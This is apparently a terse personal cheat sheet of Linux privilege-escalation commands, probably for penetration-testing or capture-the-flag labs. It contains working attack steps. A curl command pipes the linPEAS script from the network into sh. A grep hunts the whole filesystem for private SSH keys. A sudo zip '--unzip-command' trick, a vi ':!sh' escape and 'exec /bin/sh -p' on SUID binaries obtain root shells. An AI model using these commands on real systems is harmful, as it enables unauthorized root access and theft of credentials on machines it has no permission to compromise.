Linux
sudo -lto see what sudo can dosearch for anything owned by the user or groups they are in
find / -user [username] 2>/dev/null | grep -v 'proc\|sys\|run'linPEAS
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | shget suid binaries:
find / -perm -u=s -type f 2>/dev/nullSearch for SSH keys
grep -rnE '^\-{5}BEGIN [A-Z0-9]+ PRIVATE KEY\-{5}$' /* 2>/dev/nulllaunching shell from suid binary, use
exec /bin/sh -pto keep effective uid from being resetin the case of one machine, there was a binary
.suid_bash, the command./.suid_bash -pgave a root shell
weird zip command if for some reason you have sudo zip privs:
sudo zip test.zip test.txt -T --unzip-command="sh -c /bin/bash"-T tests the integrity of the zip, then --unzip-command specifies the command to unzip the file, so it uses that in the integrity checkcheck sudo environment variables
from sudo vi -
:!shto launch shellcheck ports for nfs
rpcinfo -pchecking strings in files
strings [file]try
-e lalso
Last updated